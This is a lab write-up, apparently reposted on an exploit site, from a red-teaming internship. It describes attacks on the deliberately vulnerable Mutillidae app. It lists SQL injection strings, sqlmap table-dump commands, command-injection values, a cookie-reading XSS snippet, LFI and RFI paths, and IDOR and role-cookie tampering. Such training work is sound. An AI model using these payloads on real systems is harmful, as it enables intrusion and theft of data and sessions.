Exploit for OWASP_Top10_Web_Pentest

Name: Exploit for OWASP_Top10_Web_Pentest
Rating: 5 (10 reviews)
2026-06-08 | CVSS 5.8
## https://sploitus.com/exploit?id=A3CE7C9C-D1B0-5419-B785-E6C22068CF5D
# 🔓 Week 04 — Web Application Penetration Testing (OWASP Top 10)

**Intern:** Ali Ahsan | **Roll No:** CSI-B1-427
**Program:** Cyberstar Cybersecurity Red Teaming Internship
**Instructor:** Umar Niaz
**Date:** 28 March 2026
**Target:** Mutillidae (intentionally vulnerable web app)

---

## 📌 Overview

This week covered hands-on exploitation of the most critical web application vulnerabilities based on the **OWASP Top 10**, using both manual techniques and automated tools. The lab demonstrated how insecure implementations can be identified and exploited.

---

## 🧪 Tasks Covered

### Task 01 — Burp Suite Mastery
- Configured Burp Suite with **FoxyProxy** browser extension (127.0.0.1:8080)
- Intercepted and modified live HTTP requests
- **Repeater** — replayed and modified requests manually (`/profile?id=1` → `id=2`)
- **Intruder** — dictionary-based password attack using payload list: `123456`, `password`, `admin`, `admin123`

### Task 02 — Injection Attacks (SQL & Command Injection)

**Manual SQL Injection:**
```sql
id=1'                        -- Error-based detection
id=1 OR 1=1                  -- Boolean testing
UNION SELECT 1,2,3...        -- Column enumeration
UNION SELECT version(),3     -- Data extraction
```

**SQLMap Automation:**
```bash
sqlmap -r request.txt --dbs
sqlmap -r request.txt -D dbname --tables
sqlmap -r request.txt -D dbname -T users --dump
```

**Command Injection:**
```bash
127.0.0.1; whoami
127.0.0.1 && ls       # Linux
127.0.0.1 && dir      # Windows
```

### Task 03 — Broken Access Control & IDOR
- Modified `user_id=1` → `user_id=2` in requests → accessed another user's data
- Changed cookie `role=user` → `role=admin` → admin panel access confirmed
- **Result:** IDOR and Privilege Escalation both confirmed

### Task 04 — XSS & File Inclusion

**Reflected XSS:**
```html
alert(document.cookie)
```
→ Session cookie exposed in popup ✅

**Local File Inclusion (LFI):**
```
?page=../../../etc/passwd
```
→ Not confirmed on this target

**Remote File Inclusion (RFI):**
```
?page=http://192.168.56.101/test.txt
```
→ Not confirmed on this target

---

## 📊 Vulnerability Summary

| Vulnerability | Status | Impact |
|--------------|--------|--------|
| SQL Injection | ✅ Confirmed | Database compromise |
| Command Injection | ✅ Confirmed | OS-level access |
| IDOR | ✅ Confirmed | Unauthorized data access |
| Privilege Escalation | ✅ Confirmed | Admin access |
| Reflected XSS | ✅ Confirmed | Session hijacking |
| LFI / RFI | ❌ Not confirmed | — |

---

## 🛠️ Tools Used

`Burp Suite` · `FoxyProxy` · `SQLMap` · `Mutillidae`

---

## ⚠️ Disclaimer

> Performed in an **authorized lab environment** using Mutillidae (intentionally vulnerable web app). For educational purposes only.